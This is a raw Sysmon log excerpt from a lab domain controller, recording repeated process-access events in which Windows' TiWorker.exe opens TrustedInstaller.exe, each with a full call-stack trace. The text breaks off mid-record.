13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT